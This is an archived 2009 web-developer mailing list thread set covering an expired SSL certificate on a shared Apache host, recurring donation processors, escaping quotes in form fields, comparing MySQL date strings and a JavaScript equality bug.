From fredthejonester at gmail.com Mon Jul 6 02:50:37 2009 From: fredthejonester at gmail.com (Fred Jones) Date: Mon, 6 Jul 2009 10:50:37 +0300 Subject: [thelist] Revoked SSL Message-ID: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> A site I have is no longer selling products (they had a small store section but they closed it) and so we didn't renew the SSL. But since URLs with https are index by Google, people are clicking on them and they get an error in FF and IE that the SSL cerl is revoked. Is the only fix for this to buy a new cert? From dan.p.burke at gmail.com Mon Jul 6 03:25:34 2009 From: dan.p.burke at gmail.com (Daniel Burke) Date: Mon, 6 Jul 2009 17:55:34 +0930 Subject: [thelist] Revoked SSL In-Reply-To: References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> Message-ID: Or a more complete answer, if the first thing the browser receives when going to the https URL is a http redirect header sending it to the regular http site, then the browser will never request your invalid certificate, and it will be back to normal. Most web servers have a way of doing this. On Mon, Jul 6, 2009 at 5:48 PM, Daniel Burke wrote: > or turn off https... > > On Mon, Jul 6, 2009 at 5:20 PM, Fred Jones wrote: >> A site I have is no longer selling products (they had a small store >> section but they closed it) and so we didn't renew the SSL. But since >> URLs with https are index by Google, people are clicking on them and >> they get an error in FF and IE that the SSL cerl is revoked. >> >> Is the only fix for this to buy a new cert? >> -- >> >> * * Please support the community that supports you. ?* * >> http://evolt.org/help_support_evolt/ >> >> For unsubscribe and other options, including the Tip Harvester >> and archives of thelist go to: http://lists.evolt.org >> Workers of the Web, evolt ! >> > From Ken at adOpenStatic.com Mon Jul 6 03:05:39 2009 From: Ken at adOpenStatic.com (Ken Schaefer) Date: Mon, 6 Jul 2009 18:05:39 +1000 Subject: [thelist] Revoked SSL In-Reply-To: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> Message-ID: They should be getting an error that the certificate has expired. Revokation is something else. And "Yes", I can't think of any other easier way to fix this issue. Certs from places like GoDaddy etc are pretty cheap. Cheers Ken ________________________________________ From: thelist-bounces at lists.evolt.org [thelist-bounces at lists.evolt.org] On Behalf Of Fred Jones [fredthejonester at gmail.com] Sent: Monday, 6 July 2009 5:50 PM To: thelist at lists.evolt.org Subject: [thelist] Revoked SSL A site I have is no longer selling products (they had a small store section but they closed it) and so we didn't renew the SSL. But since URLs with https are index by Google, people are clicking on them and they get an error in FF and IE that the SSL cerl is revoked. Is the only fix for this to buy a new cert? From dan.p.burke at gmail.com Mon Jul 6 03:18:23 2009 From: dan.p.burke at gmail.com (Daniel Burke) Date: Mon, 6 Jul 2009 17:48:23 +0930 Subject: [thelist] Revoked SSL In-Reply-To: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> Message-ID: or turn off https... On Mon, Jul 6, 2009 at 5:20 PM, Fred Jones wrote: > A site I have is no longer selling products (they had a small store > section but they closed it) and so we didn't renew the SSL. But since > URLs with https are index by Google, people are clicking on them and > they get an error in FF and IE that the SSL cerl is revoked. > > Is the only fix for this to buy a new cert? > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From fredthejonester at gmail.com Mon Jul 6 06:09:02 2009 From: fredthejonester at gmail.com (Fred Jones) Date: Mon, 6 Jul 2009 14:09:02 +0300 Subject: [thelist] Revoked SSL In-Reply-To: References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> Message-ID: <177c0a10907060409h36a05274n7154a010a760bde8@mail.gmail.com> > Or a more complete answer, if the first thing the browser receives > when going to the https URL is a http redirect header sending it to > the regular http site, then the browser will never request your > invalid certificate, and it will be back to normal. > > Most web servers have a way of doing this. This is a shared hosting Linux/Apache site. I tried this in .htaccess: RewriteEngine on RewriteBase / RewriteCond %{HTTPS} =on #RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /(.*)//(.*)\ HTTP/ [NC] RewriteRule ^.*$ http://%{SERVER_NAME}/%1/%2 [R=301,L] with and without that line commented but it doesn't help. :( From Ken at adOpenStatic.com Mon Jul 6 06:44:48 2009 From: Ken at adOpenStatic.com (Ken Schaefer) Date: Mon, 6 Jul 2009 21:44:48 +1000 Subject: [thelist] Revoked SSL In-Reply-To: References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> , Message-ID: This will not work. SSL handshake is negotiated before any HTTP traffic passes across the wire. Cheers Ken ________________________________________ From: thelist-bounces at lists.evolt.org [thelist-bounces at lists.evolt.org] On Behalf Of Daniel Burke [dan.p.burke at gmail.com] Sent: Monday, 6 July 2009 6:25 PM To: thelist at lists.evolt.org Subject: Re: [thelist] Revoked SSL Or a more complete answer, if the first thing the browser receives when going to the https URL is a http redirect header sending it to the regular http site, then the browser will never request your invalid certificate, and it will be back to normal. Most web servers have a way of doing this. On Mon, Jul 6, 2009 at 5:48 PM, Daniel Burke wrote: > or turn off https... > > On Mon, Jul 6, 2009 at 5:20 PM, Fred Jones wrote: >> A site I have is no longer selling products (they had a small store >> section but they closed it) and so we didn't renew the SSL. But since >> URLs with https are index by Google, people are clicking on them and >> they get an error in FF and IE that the SSL cerl is revoked. >> >> Is the only fix for this to buy a new cert? >> -- >> >> * * Please support the community that supports you. * * >> http://evolt.org/help_support_evolt/ >> >> For unsubscribe and other options, including the Tip Harvester >> and archives of thelist go to: http://lists.evolt.org >> Workers of the Web, evolt ! >> > -- * * Please support the community that supports you. * * http://evolt.org/help_support_evolt/ For unsubscribe and other options, including the Tip Harvester and archives of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! From pturmel-webdev at turmel.org Mon Jul 6 07:52:35 2009 From: pturmel-webdev at turmel.org (Phil Turmel) Date: Mon, 06 Jul 2009 08:52:35 -0400 Subject: [thelist] Revoked SSL In-Reply-To: References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> Message-ID: <4A51F393.70507@turmel.org> Daniel Burke wrote: > Or a more complete answer, if the first thing the browser receives > when going to the https URL is a http redirect header sending it to > the regular http site, then the browser will never request your > invalid certificate, and it will be back to normal. > > Most web servers have a way of doing this. > Sorry, No. The SSL security layer is "below" the http layer in an https connection, so the encryption failure happens before the GET or POST is even sent down the wire. Closing port 443 will change the error to some form of "host not responding", but that's all you can do without a new certificate. HTH, Phil From fredthejonester at gmail.com Mon Jul 6 08:41:24 2009 From: fredthejonester at gmail.com (Fred Jones) Date: Mon, 6 Jul 2009 16:41:24 +0300 Subject: [thelist] Revoked SSL In-Reply-To: References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> Message-ID: <177c0a10907060641u2db63f37wdccf477c6bc51163@mail.gmail.com> > This will not work. SSL handshake is negotiated before any HTTP traffic passes across the wire. Yes, that's how it appears. What is your solution, then, Daniel? Thanks. From bobm at dottedi.biz Mon Jul 6 08:47:18 2009 From: bobm at dottedi.biz (Bob Meetin) Date: Mon, 06 Jul 2009 07:47:18 -0600 Subject: [thelist] Revoked SSL In-Reply-To: <4A51F393.70507@turmel.org> References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> <4A51F393.70507@turmel.org> Message-ID: <4A520066.4070602@dottedi.biz> Phil Turmel wrote: > Daniel Burke wrote: > >> Or a more complete answer, if the first thing the browser receives >> when going to the https URL is a http redirect header sending it to >> the regular http site, then the browser will never request your >> invalid certificate, and it will be back to normal. >> >> Most web servers have a way of doing this. >> > Sorry, No. The SSL security layer is "below" the http layer in an https > connection, so the encryption failure happens before the GET or POST is > even sent down the wire. > > Closing port 443 will change the error to some form of "host not > responding", but that's all you can do without a new certificate. > > HTH, > > Phil > I do not know the answer, but for what it's worth I might run this by the webhost provider and ask their suggestions. The support staff at hostgator, bluehost and some others are pretty smart and probably have run into this problem in the past. -- Bob From dan.p.burke at gmail.com Mon Jul 6 10:43:30 2009 From: dan.p.burke at gmail.com (Daniel Burke) Date: Tue, 7 Jul 2009 01:13:30 +0930 Subject: [thelist] Revoked SSL In-Reply-To: <4A520066.4070602@dottedi.biz> References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> <4A51F393.70507@turmel.org> <4A520066.4070602@dottedi.biz> Message-ID: I seem to recall if you tell apache to listen for http on the https port, and then put in something to send a location header the browser will do the right thing, although it's been a while and I'm suspecting my brain is just filling in gaps... it's feeling more and more like I have the two the wrong way around. On Mon, Jul 6, 2009 at 11:17 PM, Bob Meetin wrote: > Phil Turmel wrote: >> Daniel Burke wrote: >> >>> Or a more complete answer, if the first thing the browser receives >>> when going to the https URL is a http redirect header sending it to >>> the regular http site, then the browser will never request your >>> invalid certificate, and it will be back to normal. >>> >>> Most web servers have a way of doing this. >>> >> Sorry, No. ?The SSL security layer is "below" the http layer in an https >> connection, so the encryption failure happens before the GET or POST is >> even sent down the wire. >> >> Closing port 443 will change the error to some form of "host not >> responding", but that's all you can do without a new certificate. >> >> HTH, >> >> Phil >> > I do not know the answer, but for what it's worth I might run this by > the webhost provider and ask their suggestions. ?The support staff at > hostgator, bluehost and some others are pretty smart and probably have > run into this problem in the past. > > -- > Bob > > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From fredthejonester at gmail.com Mon Jul 6 13:59:21 2009 From: fredthejonester at gmail.com (Fred Jones) Date: Mon, 6 Jul 2009 21:59:21 +0300 Subject: [thelist] Revoked SSL In-Reply-To: <4A520066.4070602@dottedi.biz> References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> <4A51F393.70507@turmel.org> <4A520066.4070602@dottedi.biz> Message-ID: <177c0a10907061159m1ede12f8k10403823d29c2d95@mail.gmail.com> > I do not know the answer, but for what it's worth I might run this by > the webhost provider and ask their suggestions. ?The support staff at > hostgator, bluehost and some others are pretty smart and probably have > run into this problem in the past. I did. And I quote: > The only solution to get rid of the SSL warnings when using an https:// address is to buy a valid certificate for your site. Dat's what we're doing now. :) Thanks. From ronr at linuxdude.com Mon Jul 6 15:59:37 2009 From: ronr at linuxdude.com (Ron) Date: Mon, 06 Jul 2009 16:59:37 -0400 Subject: [thelist] SSL Certificate Denied In-Reply-To: <177c0a10907061159m1ede12f8k10403823d29c2d95@mail.gmail.com> References: <177c0a10907060050yfe0012eqed1bf5ff4a73fdb6@mail.gmail.com> <4A51F393.70507@turmel.org> <4A520066.4070602@dottedi.biz> <177c0a10907061159m1ede12f8k10403823d29c2d95@mail.gmail.com> Message-ID: <4A5265B9.8000307@linuxdude.com> The "Revoked SSL" thread reminded me of a problem I ran into recently. I went to RapidSSL a while back to get a cert and the certificate request was denied. Never heard of this before. The is nothing unusual about the domain the cert was for and we have purchased other certs from Rapid with no problem. I chatted with one of the Rapid reps online and was basically told it was not possible to get a reason for why it was denied. Has anyone ever been denied a certificate? Does any one have an idea why one would be denied? Note... this was for their lowest cost cert since the purpose was only to prevent passwords from being sent in clear text... ended up just doing a self signed cert. TIA Ron From danielk at umd.edu Tue Jul 7 08:54:54 2009 From: danielk at umd.edu (Daniel Kessler) Date: Tue, 7 Jul 2009 09:54:54 -0400 Subject: [thelist] singe and double quotes in a text field Message-ID: I have a text field and I want to allow users to type in information that may have both single and double quotes in it. For example, How do I go about doing that? It'll be going into a database and then retrieved from there for editing. I use Cold Fusion as my middle-ware. thanks in advance. -- Daniel Kessler University of Maryland College Park School of Public Health 3302E SPH Building College Park, MD 20742-2611 Phone: 301-405-2545 http://sph.umd.edu From bobm at dottedi.biz Tue Jul 7 08:50:01 2009 From: bobm at dottedi.biz (Bob Meetin) Date: Tue, 07 Jul 2009 07:50:01 -0600 Subject: [thelist] Recurring Donations Message-ID: <4A535289.8060405@dottedi.biz> My client wants a versatile donation page, varying amounts (the easy part), but also the ability to set up automated recurring (monthly, quarterly, yearly, etc) donations. We also want to keep all member info including donor history, local in our database, but not keep credit cards on file warranting additional security and responsibility. There are a number of donation services out there where once you get sent to their website, they offer recurring options. It might be a poor assumption, but I assume that they have set up additional security in order to be able to store cc# and do this. Then of course we would need to find some way to reconcile member info and such which becomes another maintenance step. Is this more/less complicated than I am thinking? Options? -- Bob Meetin www.dottedi.biz 303-926-0167 On www.Twitter.com/bobmeetin, Facebook, www.linkedin.com/in/bobmeetin, or catch my blog at www.dottedi.biz/blog.php Standards - you gotta love em - with so many to choose from! From fredthejonester at gmail.com Tue Jul 7 09:12:04 2009 From: fredthejonester at gmail.com (Fred Jones) Date: Tue, 7 Jul 2009 17:12:04 +0300 Subject: [thelist] Recurring Donations In-Reply-To: <4A535289.8060405@dottedi.biz> References: <4A535289.8060405@dottedi.biz> Message-ID: <177c0a10907070712v1459003ay7355997ef7eb4289@mail.gmail.com> > There are a number of donation services out there where once you get > sent to their website, they offer recurring options. ?It might be a poor > assumption, but I assume that they have set up additional security in > order to be able to store cc# and do this. ?Then of course we would need > to find some way to reconcile member info and such which becomes another > maintenance step. > > Is this more/less complicated than I am thinking? Options? One option is CiviCRM, but it has a learning curve: http://forum.civicrm.org/index.php/topic,8156.msg35262.html#msg35262 From hassan.schroeder at gmail.com Tue Jul 7 09:16:40 2009 From: hassan.schroeder at gmail.com (Hassan Schroeder) Date: Tue, 7 Jul 2009 07:16:40 -0700 Subject: [thelist] Recurring Donations In-Reply-To: <4A535289.8060405@dottedi.biz> References: <4A535289.8060405@dottedi.biz> Message-ID: <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> On Tue, Jul 7, 2009 at 6:50 AM, Bob Meetin wrote: > There are a number of donation services out there where once you get > sent to their website, they offer recurring options. ?It might be a poor > assumption, but I assume that they have set up additional security in > order to be able to store cc# and do this. I know Authorize.net (and presumably most such services) offer a recurring billing option where you only store a token representing a customer's account rather than storing the CC yourself, and they handle the "recurring" part. Much safer all the way around :-) HTH, -- Hassan Schroeder ------------------------ hassan.schroeder at gmail.com twitter: @hassan From nan at nanharbison.com Tue Jul 7 09:48:39 2009 From: nan at nanharbison.com (Nan Harbison) Date: Tue, 7 Jul 2009 10:48:39 -0400 Subject: [thelist] Recurring Donations In-Reply-To: <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> References: <4A535289.8060405@dottedi.biz> <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> Message-ID: I second Hassan's suggestion. Simple to use, almost no learning curve. That said, however, their tech support sometimes gives you conflicting information if you have a question! Nan -----Original Message----- From: thelist-bounces at lists.evolt.org [mailto:thelist-bounces at lists.evolt.org] On Behalf Of Hassan Schroeder Sent: Tuesday, July 07, 2009 10:17 AM To: bobm at dottedi.biz; thelist at lists.evolt.org Subject: Re: [thelist] Recurring Donations On Tue, Jul 7, 2009 at 6:50 AM, Bob Meetin wrote: > There are a number of donation services out there where once you get > sent to their website, they offer recurring options. ?It might be a > poor assumption, but I assume that they have set up additional > security in order to be able to store cc# and do this. I know Authorize.net (and presumably most such services) offer a recurring billing option where you only store a token representing a customer's account rather than storing the CC yourself, and they handle the "recurring" part. Much safer all the way around :-) HTH, -- Hassan Schroeder ------------------------ hassan.schroeder at gmail.com twitter: @hassan -- * * Please support the community that supports you. * * http://evolt.org/help_support_evolt/ For unsubscribe and other options, including the Tip Harvester and archives of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! From lee.kowalkowski at googlemail.com Tue Jul 7 10:38:13 2009 From: lee.kowalkowski at googlemail.com (Lee Kowalkowski) Date: Tue, 7 Jul 2009 16:38:13 +0100 Subject: [thelist] singe and double quotes in a text field In-Reply-To: References: Message-ID: <610592c90907070838s66490ff7v2fd8a37e734a1dc5@mail.gmail.com> 2009/7/7 Daniel Kessler : > I have a text field and I want to allow users to type in information > that may have both single and double quotes in it. ?For example, > > the 'book' if you know what I mean" size="55" maxlength="400" /> You just need to replace your " with " > How do I go about doing that? ?It'll be going into a database and then > retrieved from there for editing. ?I use Cold Fusion as my middle-ware. You could store them escaped, or escape your double quotes only when rendering. I prefer the latter, as it's easier to edit and reuse your content. -- Lee www.webdeavour.co.uk From nan at nanharbison.com Tue Jul 7 11:12:35 2009 From: nan at nanharbison.com (Nan Harbison) Date: Tue, 7 Jul 2009 12:12:35 -0400 Subject: [thelist] simple question about comparing dates in PHP/MySQL Message-ID: Hi All, This might be a stupid question, but someone was trying to tell me that you can compare dates in the format: 2009-06-04 > 2009-05-30. I thought I had to convert dates using strtotime() to compare dates, but he said he had been doing it and it worked fine. I have found it works sporadically. Can anyone give me a definitive answer on this subject? I googled for it, and most articles have you convert the date, but nowhere does any article say you actually have to convert or why. I think it is because the date as 2009-07-7 is a string and it is doing some string comparison? Thanks! Nan From willthemoor at gmail.com Tue Jul 7 11:36:03 2009 From: willthemoor at gmail.com (Will) Date: Tue, 7 Jul 2009 09:36:03 -0700 Subject: [thelist] Recurring Donations In-Reply-To: References: <4A535289.8060405@dottedi.biz> <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> Message-ID: <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> paypal offers recurring donations. simple to set up. On Tue, Jul 7, 2009 at 7:48 AM, Nan Harbison wrote: > I second Hassan's suggestion. Simple to use, almost no learning curve. That > said, however, their tech support sometimes gives you conflicting > information if you have a question! > Nan > > -----Original Message----- > From: thelist-bounces at lists.evolt.org > [mailto:thelist-bounces at lists.evolt.org] On Behalf Of Hassan Schroeder > Sent: Tuesday, July 07, 2009 10:17 AM > To: bobm at dottedi.biz; thelist at lists.evolt.org > Subject: Re: [thelist] Recurring Donations > > On Tue, Jul 7, 2009 at 6:50 AM, Bob Meetin wrote: > >> There are a number of donation services out there where once you get >> sent to their website, they offer recurring options. ?It might be a >> poor assumption, but I assume that they have set up additional >> security in order to be able to store cc# and do this. > > I know Authorize.net (and presumably most such services) offer a recurring > billing option where you only store a token representing a customer's > account rather than storing the CC yourself, and they handle the "recurring" > part. Much safer all the way around :-) > > HTH, > -- > Hassan Schroeder ------------------------ hassan.schroeder at gmail.com > twitter: @hassan > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester and archives > of thelist go to: http://lists.evolt.org Workers of the Web, evolt ! > > -- > > * * Please support the community that supports you. ?* * > http://evolt.org/help_support_evolt/ > > For unsubscribe and other options, including the Tip Harvester > and archives of thelist go to: http://lists.evolt.org > Workers of the Web, evolt ! > From alamaka at gmail.com Tue Jul 7 12:03:34 2009 From: alamaka at gmail.com (Kamala Whitaker) Date: Tue, 7 Jul 2009 10:03:34 -0700 Subject: [thelist] Recurring Donations In-Reply-To: <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> References: <4A535289.8060405@dottedi.biz> <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> Message-ID: I recommend Obopay. www.obopay.com -Kamala On Tue, Jul 7, 2009 at 9:36 AM, Will wrote: > paypal offers recurring donations. simple to set up. > > > -- "Beneath me, this awful city, it screams like an abattoir full of retarded children." Rorschach - The Watchmen From martin at easyweb.co.uk Tue Jul 7 13:01:39 2009 From: martin at easyweb.co.uk (Martin Burns) Date: Tue, 7 Jul 2009 19:01:39 +0100 Subject: [thelist] Recurring Donations In-Reply-To: <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> References: <4A535289.8060405@dottedi.biz> <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> Message-ID: On 7 Jul 2009, at 17:36, Will wrote: > paypal offers recurring donations. simple to set up. Yup - evolt.org uses it and accepts recurring (and one-off) donations. http://evolt.org/help_support_evolt#donations Cheers Martin -- > Spammers: Send me email -> yumyum at easyweb.co.uk to train my filter > http://dspam.nuclearelephant.com/ From danielk at umd.edu Tue Jul 7 13:43:11 2009 From: danielk at umd.edu (Daniel Kessler) Date: Tue, 7 Jul 2009 14:43:11 -0400 Subject: [thelist] singe and double quotes in a text field Message-ID: It worked great. I had assumed that it'd put " into the database, but it didn't. Thank you very much Lee. -- Daniel Kessler University of Maryland College Park School of Public Health 3302E SPH Building College Park, MD 20742-2611 Phone: 301-405-2545 http://sph.umd.edu From lee.kowalkowski at googlemail.com Tue Jul 7 14:35:45 2009 From: lee.kowalkowski at googlemail.com (Lee Kowalkowski) Date: Tue, 7 Jul 2009 20:35:45 +0100 Subject: [thelist] simple question about comparing dates in PHP/MySQL In-Reply-To: References: Message-ID: <610592c90907071235v10f23673xd56d479ae8dfa368@mail.gmail.com> 2009/7/7 Nan Harbison : > This might be a stupid question, but someone was trying to tell me that you > can compare dates in the format: > 2009-06-04 > 2009-05-30. > > I thought I had to convert dates using strtotime() to compare dates, but he > said he had been doing it and it worked fine. I have found it works > sporadically. > Can anyone give me a definitive answer on this subject? I googled for it, > and most articles have you convert the date, but nowhere does any article > say you actually have to convert or why. I think it is because the date as > 2009-07-7 is a string and it is doing some string comparison? To sort your dates it should work fine as long as you are using yyyy-mm-dd, both strings use the same encoding and you always zero-pad your single-digit months and days. It'll work until the year 10000 anyway. You can't use this if you're interested in the difference between the dates, obviously. -- Lee www.webdeavour.co.uk From bobm at dottedi.biz Tue Jul 7 14:44:12 2009 From: bobm at dottedi.biz (Bob Meetin) Date: Tue, 07 Jul 2009 13:44:12 -0600 Subject: [thelist] Recurring Donations In-Reply-To: References: <4A535289.8060405@dottedi.biz> <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> Message-ID: <4A53A58C.9040004@dottedi.biz> Martin Burns wrote: > On 7 Jul 2009, at 17:36, Will wrote: > >> paypal offers recurring donations. simple to set up. >> > > Yup - evolt.org uses it and accepts recurring (and one-off) donations. > http://evolt.org/help_support_evolt#donations > > Cheers > Martin Thanks all thus far; I am diving into absorptive mode. I have not looked at (well, er, assessed) all the replies yet. The key, again, is being able to store member info such as name, email, donation history, etc (but no credit cards) in a local database which will be merged with the website's member list. Authorize.net - I use them on several websites and have been satisfied with their tech support. they helped me better understand the auth process. The "token" sounds doable. Paypal - I will need to sort through how to take that info that gets passed to PayPal and grab the pertinent part we need to store locally. There are a number of PayPal Joomla extensions which require investigation. Bank - I contacted a bank which we used to manage an online auction once and they verbally indicated that they have a system (and very fair rates) that would do what I ask and will set up a demo. -Bob From rudy at r937.com Tue Jul 7 21:47:43 2009 From: rudy at r937.com (r937) Date: Tue, 7 Jul 2009 22:47:43 -0400 Subject: [thelist] simple question about comparing dates in PHP/MySQL Message-ID: <8C6E5750E81147F785C15E5BEE6CAFEB@curly> > This might be a stupid question, but someone was trying to tell me > that you can compare dates in the format: 2009-06-04 > 2009-05-30. that is false as written, those are arithmetic expressions, not dates 2009-06-04 evaluates to the integer 1999, while 2009-05-30 evaluates to the integer 1974 clearly, not what was intended written as date strings, however, yes, you can compare them meaningfully '2009-06-04' > '2009-05-30' see the difference? by the way, lee, mysql does not require date strings to zero-pad the month or day furthermore, mysql will recognize any character as the year/month/day separator, so all of the following are valid dates -- '2009-05-30' '2009-5-30' '2009/05/30' '2009.5.30' '2009?05?30' rudy http://simply-sql.com/ From zachary.kent at gmail.com Tue Jul 7 22:56:36 2009 From: zachary.kent at gmail.com (Zachary Kent) Date: Tue, 7 Jul 2009 23:56:36 -0400 Subject: [thelist] page weight In-Reply-To: References: Message-ID: <2d59a5a30907072056w6169f259hc15bb64c1181205e@mail.gmail.com> On Mon, Jun 29, 2009 at 9:25 AM, Susan Payne wrote: > Do you have a standard for the total page weight for your sites? I have > a graphic designer who's giving me image files that are way too large. > My previous employer said no bigger than what would take more than 10 > secs to download over a 56k. I think that's not reasonable and am not > really designing for dial up. Slow public wi-fi, yes. > > > > Any standards/sources that can back me up as to why a total page size of > half a MB is too much would be appreciated. > > Another good way to test a site is to use a proxy that is intentionally throttled so you can simulate that slow connection feeling. One I bookmarked recently is http://www.dallaway.com/sloppy/ But I haven't tried it yet. I believe there are other slow proxies out there you can use for testing. Zach From judah at wiredotter.com Wed Jul 8 00:03:43 2009 From: judah at wiredotter.com (Judah McAuley) Date: Tue, 7 Jul 2009 22:03:43 -0700 Subject: [thelist] Recurring Donations In-Reply-To: <4A53A58C.9040004@dottedi.biz> References: <4A535289.8060405@dottedi.biz> <4eedb92a0907070716n61d2b16dhc59a7ae0331518d8@mail.gmail.com> <2506fbd50907070936w4ff309e5pcabb7f1bde2e28d2@mail.gmail.com> <4A53A58C.9040004@dottedi.biz> Message-ID: On Tue, Jul 7, 2009 at 12:44 PM, Bob Meetin wrote: > Authorize.net - I use them on several websites and have been satisfied > with their tech support. ?they helped me better understand the auth > process. The "token" sounds doable. A couple of caveats about Authorize.net from someone who has been beating his head against his desk recently... One time payments are straight forward and pretty easy. No troubles there. Except sometimes in the merchant setup. It took a month solid of back and forth to get one company set up. Authorize.net said everything was good. When we actually tried it live mode, every transaction failed. Turns out that they had not actually set up the merchant account on their side at all and did not have the correct information. So all transactions failed with a "General Error" which didn't even exist in their documention. None of that showed up in Test Mode and it took a couple more weeks to get it all ironed out. Then there are recurring payments or subscriptions in the authorize.net terminology. You can't test them. The Developer Account you can get will allow you to test various successes/failures, which is great for one time payments. But you can't specify a post back url because it is a globally shared account. So if you set up a subscription, subsequent payments would never be sent back to you. In a real merchant account in Test Mode, you can specify a post back url but the payments aren't processed because it is in Test Mode so the post back never gets triggered. Not that they tell you that, oh no, that would be too simple. Oh and I just found out the hard way the other day that they don't support a post back to an https url in spite of letting you specify one in the setup. And that "we don't support a post back to https" occurred after they tried posting 5 times, generating an unknown 500 IIS error, then mysteriously no longer even attempting to post back to us. Why did it try 5 times then stop? They don't know. They just say they don't support it. My way past experience with authorize.net says that once you get it working, it is pretty solid. But this most recent iteration of work with them, which includes my first time doing recurring payments, makes me want to strangle each and ever employee of that company personally. Just an venting fyi. Judah From beertastic at gmail.com Wed Jul 8 05:47:25 2009 From: beertastic at gmail.com (Tris) Date: Wed, 8 Jul 2009 11:47:25 +0100 Subject: [thelist] [javaScript] removing values from forms Message-ID: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> I'm trying to clear an input box is the default value is not changed.. Here's what I've got and can't figure why it's not working...? Thoughts...? function clearBox(inputName, inputDisplay) { if (document.addUser.inputName.value = inputDisplay) { document.addUser.inputName.value = ''; } } And here's a small form
-- "The only people who don't make mistakes are those who don't do anything" Give a man a fish and he'll feed himself for a day. Give a man a religion and he'll starve to death praying for a fish. Anon `We are what we pretend to be, so we must be careful what we pretend to be.` Kurt Vonnegut `When a person can no longer laugh at himself, it is time for others to laugh at him.` Thomas Szasz From sales at lycosa.co.uk Wed Jul 8 07:48:04 2009 From: sales at lycosa.co.uk (Sales @ Lycosa) Date: Wed, 8 Jul 2009 13:48:04 +0100 Subject: [thelist] Cheap Software Message-ID: <95F8348C434842B2B531C639DC541D97@DEV> In an effort to save money in these troubled times, I have found a website that sells cheap software, and I wanted to check it out with you guys first. Has anyone used www.oemlibrary.com and if so, is it legitimate, or has anyone been burned? Thanks, Phil Parker From volkan.ozcelik at gmail.com Wed Jul 8 08:56:07 2009 From: volkan.ozcelik at gmail.com (=?ISO-8859-1?Q?Volkan_=D6z=E7elik?=) Date: Wed, 8 Jul 2009 16:56:07 +0300 Subject: [thelist] [javaScript] removing values from forms In-Reply-To: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> References: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> Message-ID: Hi Tris, passing your code through JSLint [1] will help you (most of the time) spot out incorrect usages of JavaScript: JSLint says: Problem at line 2 character 41: Expected a conditional expression and instead saw an assignment at: if (document.addUser.inputName.value *=* inputDisplay) { which clearly is the logic error behind your code. JavaScript is not a strongly-type language. It's rather loose, prototypical and functional. This will make it harder to spot out js-related errors. Make sure that you pass your javascript through Jslint ( http://www.jslint.com ) In the end you will spot out some hidden bugs and gain a leaner, structured code. HTH, -- Volkan Ozcelik +> Front End Architect, MessengerFX : http://www.messengerfx.com/ +> I tweet: http://twitter.com/linkibol +> linkibol.com - in seek for quality links : http://www.linkibol.com/ +> my blog (in Turkish) : http://www.fikribol.com/donkisot/ +> Sardalya JavaScript Library : http://www.sarmal.com/sardalya/ From matt at camadro.com Wed Jul 8 08:42:43 2009 From: matt at camadro.com (Matt McKeon) Date: Wed, 08 Jul 2009 09:42:43 -0400 Subject: [thelist] [javaScript] removing values from forms In-Reply-To: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> References: <8b20a7490907080347g599a9640p9ce9b74d6dd160a4@mail.gmail.com> Message-ID: <4A54A253.4000604@camadro.com> Tris wrote: > I'm trying to clear an input box is the default value is not changed.. > Here's what I've got and can't figure why it's not working...? > Thoughts...? > > function clearBox(inputName, inputDisplay) { > if (document.addUser.inputName.value = inputDisplay) { > document.addUser.inputName.value = ''; > } > } > In the above if statement, you are doing an assignment rather then a equality test. So the value of the input keeps getting set to inputDisplay rather then being tested against that value. Changing it to == should help. HTH Matt From bobm at dottedi.biz Wed Jul 8 09:44:41 2009 From: bobm at dottedi.biz (Bob Meetin) Date: Wed, 08 Jul 2009 08:44:41 -0600 Subject: [thelist] [WD]: WordPress - PHP to include
